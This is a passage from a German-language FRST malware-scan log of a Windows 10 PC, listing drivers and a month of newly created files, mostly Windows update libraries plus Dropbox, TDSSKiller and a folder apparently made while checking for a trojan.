S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51296 2016-10-03] (Synaptics Incorporated)
R1 SMIDriver; C:\WINDOWS\system32\DRIVERS\smi.sys [39488 2016-07-13] (Synaptics Incorporated)
R3 SPUVCbv; C:\WINDOWS\System32\Drivers\SPUVCbv64.sys [749640 2016-07-01] (Sunplus Innovation Technology Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-07-04 21:41 - 2017-07-04 21:42 - 00015633 _____ C:\Users\ararat\Desktop\FRST.txt
2017-07-04 21:39 - 2017-07-04 21:40 - 00001140 _____ C:\Users\ararat\Desktop\Search.txt
2017-07-04 21:39 - 2017-07-04 21:39 - 00000000 ____D C:\Users\ararat\Desktop\FRST-OlderVersion
2017-07-04 21:35 - 2017-07-04 21:39 - 00283900 _____ C:\TDSSKiller.3.1.0.15_04.07.2017_21.35.13_log.txt
2017-07-04 21:34 - 2017-07-04 21:34 - 04922400 _____ (AO Kaspersky Lab) C:\Users\ararat\Downloads\tdsskiller.exe
2017-07-04 21:34 - 2017-07-04 21:34 - 04922400 _____ (AO Kaspersky Lab) C:\Users\ararat\Desktop\tdsskiller.exe
2017-07-04 09:44 - 2017-07-04 09:44 - 00000000 ____H C:\ProgramData\cm-lock
2017-07-03 23:53 - 2017-07-03 23:56 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2017-07-02 23:17 - 2017-07-04 21:40 - 00000000 ____D C:\Users\ararat\Desktop\Troja
2017-07-02 20:58 - 2017-07-04 21:41 - 00000000 ____D C:\FRST
2017-07-02 20:45 - 2017-07-04 21:39 - 02436096 _____ (Farbar) C:\Users\ararat\Desktop\FRST64.exe
2017-07-02 20:37 - 2017-07-02 20:37 - 02435584 _____ (Farbar) C:\Users\ararat\Downloads\FRST64.exe
2017-06-29 23:31 - 2017-06-29 23:32 - 00000000 ____D C:\Users\ararat\Desktop\3D Druck
2017-06-27 22:23 - 2017-06-27 22:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-06-27 21:01 - 2017-06-27 21:01 - 00000000 ____D C:\Users\ararat\AppData\Local\DBG
2017-06-26 12:27 - 2017-06-26 12:27 - 00049992 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.)
C:\WINDOWS\system32\Drivers\dbx-canary.sys 2017-06-18 10:32 - 2017-06-18 10:32 - 02373944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WudfUpdate_01011.dll 2017-06-14 20:30 - 2017-06-03 12:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2017-06-14 20:30 - 2017-06-03 12:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-06-14 20:30 - 2017-06-03 12:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2017-06-14 20:30 - 2017-06-03 12:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-06-14 20:30 - 2017-06-03 12:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-06-14 20:30 - 2017-06-03 12:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys 2017-06-14 20:30 - 2017-06-03 12:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-06-14 20:30 - 2017-06-03 12:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2017-06-14 20:30 - 2017-06-03 12:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-06-14 20:30 - 2017-06-03 12:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2017-06-14 20:30 - 2017-06-03 12:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys 2017-06-14 20:30 - 2017-06-03 12:02 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-06-14 20:30 - 2017-06-03 12:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-06-14 20:30 - 2017-06-03 12:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll 2017-06-14 20:30 - 2017-06-03 12:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll 2017-06-14 20:30 - 2017-06-03 12:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys 2017-06-14 20:30 - 2017-06-03 
11:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2017-06-14 20:30 - 2017-06-03 11:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-06-14 20:30 - 2017-06-03 11:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2017-06-14 20:30 - 2017-06-03 11:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe 2017-06-14 20:30 - 2017-06-03 11:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-06-14 20:30 - 2017-06-03 11:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-06-14 20:30 - 2017-06-03 11:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll 2017-06-14 20:30 - 2017-06-03 11:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2017-06-14 20:30 - 2017-06-03 11:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 02228120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 01693600 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 01458592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00848288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00846752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe 2017-06-14 20:30 - 2017-06-03 11:56 - 00844696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00697760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 
00672672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00399264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll 2017-06-14 20:30 - 2017-06-03 11:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2017-06-14 20:30 - 2017-06-03 11:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2017-06-14 20:30 - 2017-06-03 11:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-06-14 20:30 - 2017-06-03 11:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-06-14 20:30 - 2017-06-03 11:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll 2017-06-14 20:30 - 2017-06-03 11:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-06-14 20:30 - 2017-06-03 11:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-06-14 20:30 - 2017-06-03 11:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll 2017-06-14 20:30 - 2017-06-03 11:21 - 01516448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll 2017-06-14 20:30 - 2017-06-03 11:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-06-14 20:30 - 2017-06-03 11:14 - 03673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-06-14 20:30 - 2017-06-03 11:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll 2017-06-14 20:30 - 2017-06-03 11:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll 2017-06-14 20:30 - 2017-06-03 11:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll 2017-06-14 20:30 - 2017-06-03 11:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2017-06-14 20:30 - 2017-06-03 11:12 - 00119296 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\UserDataTimeUtil.dll 2017-06-14 20:30 - 2017-06-03 11:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-06-14 20:30 - 2017-06-03 11:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-06-14 20:30 - 2017-06-03 11:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-06-14 20:30 - 2017-06-03 11:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2017-06-14 20:30 - 2017-06-03 11:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys 2017-06-14 20:30 - 2017-06-03 11:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll 2017-06-14 20:30 - 2017-06-03 11:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2017-06-14 20:30 - 2017-06-03 11:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe 2017-06-14 20:30 - 2017-06-03 11:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe 2017-06-14 20:30 - 2017-06-03 11:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll 2017-06-14 20:30 - 2017-06-03 11:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll 2017-06-14 20:30 - 2017-06-03 11:09 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2017-06-14 20:30 - 2017-06-03 11:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-06-14 20:30 - 2017-06-03 11:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-06-14 20:30 - 2017-06-03 11:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE 2017-06-14 20:30 - 2017-06-03 11:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2017-06-14 20:30 - 2017-06-03 11:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe 
2017-06-14 20:30 - 2017-06-03 11:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll 2017-06-14 20:30 - 2017-06-03 11:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll 2017-06-14 20:30 - 2017-06-03 11:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll 2017-06-14 20:30 - 2017-06-03 11:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-06-14 20:30 - 2017-06-03 11:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2017-06-14 20:30 - 2017-06-03 11:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-06-14 20:30 - 2017-06-03 11:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-06-14 20:30 - 2017-06-03 11:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2017-06-14 20:30 - 2017-06-03 11:03 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll 2017-06-14 20:30 - 2017-06-03 11:02 - 08245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-06-14 20:30 - 2017-06-03 11:01 - 06726656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe 2017-06-14 20:30 - 2017-06-03 11:01 - 02804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2017-06-14 20:30 - 2017-06-03 11:00 - 03379200 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2017-06-14 20:30 - 
2017-06-03 11:00 - 00933376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe 2017-06-14 20:30 - 2017-06-03 11:00 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2017-06-14 20:30 - 2017-06-03 10:59 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-06-14 20:30 - 2017-06-03 10:59 - 02672128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2017-06-14 20:30 - 2017-06-03 10:59 - 02625024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll 2017-06-14 20:30 - 2017-06-03 10:59 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2017-06-14 20:30 - 2017-06-03 10:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-06-14 20:30 - 2017-06-03 10:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2017-06-14 20:30 - 2017-06-03 10:59 - 01142784 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2017-06-14 20:30 - 2017-06-03 10:59 - 00975360 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe 2017-06-14 20:30 - 2017-06-03 10:59 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2017-06-14 20:30 - 2017-06-03 10:58 - 05961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2017-06-14 20:30 - 2017-06-03 10:58 - 02650112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2017-06-14 20:30 - 2017-06-03 10:58 - 02516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll 2017-06-14 20:30 - 2017-06-03 10:58 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2017-06-14 20:30 - 2017-06-03 10:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll 2017-06-14 20:30 - 2017-06-03 10:58 - 00827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll 2017-06-14 20:30 - 2017-06-03 10:57 - 11870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-06-14 20:30 - 2017-06-03 
10:57 - 06535168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe 2017-06-14 20:30 - 2017-06-03 10:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll 2017-06-14 20:30 - 2017-06-03 10:57 - 02829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2017-06-14 20:30 - 2017-06-03 10:57 - 01675264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll 2017-06-14 20:30 - 2017-06-03 10:57 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2017-06-14 20:30 - 2017-06-03 10:57 - 00797184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe 2017-06-14 20:30 - 2017-06-03 10:56 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-06-14 20:30 - 2017-06-03 10:55 - 03656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-06-14 20:30 - 2017-06-03 10:55 - 02132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2017-06-14 20:30 - 2017-06-03 10:55 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2017-06-14 20:30 - 2017-06-03 10:54 - 02341376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll 2017-06-14 20:30 - 2017-06-03 10:54 - 02298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2017-06-14 20:30 - 2017-06-03 10:54 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwcreator.exe 2017-06-14 20:30 - 2017-06-03 10:53 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll 2017-06-14 20:30 - 2017-06-03 10:51 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\bfsvc.exe 2017-06-12 21:56 - 2017-06-14 20:22 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2 2017-06-12 21:55 - 2017-06-12 21:55 - 00000000 ____D C:\ProgramData\Microsoft OneDrive 2017-06-12 21:54 - 2017-06-12 21:54 - 00000020 ___SH C:\Users\ararat\ntuser.ini 2017-06-08 09:54 - 2017-07-03 01:27 - 00000000 ____D C:\Windows.old 2017-06-08 09:54 - 2017-06-08 09:54 - 
17365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 13840384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 08331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 07325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 06551856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 05821496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 05802968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 05719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 04847928 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 04709528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 04707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 04672848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 04537344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2017-06-08 09:54 - 
2017-06-08 09:54 - 04417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 04056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 03803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 03784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 03332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 03135488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 02679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02604256 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02424016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02347520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02088960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2017-06-08 09:54 - 2017-06-08 09:54 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2017-06-08 09:54 - 2017-06-08 09:54 - 01984000 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01911752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01700408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01600512 _____ (Microsoft Corporation) 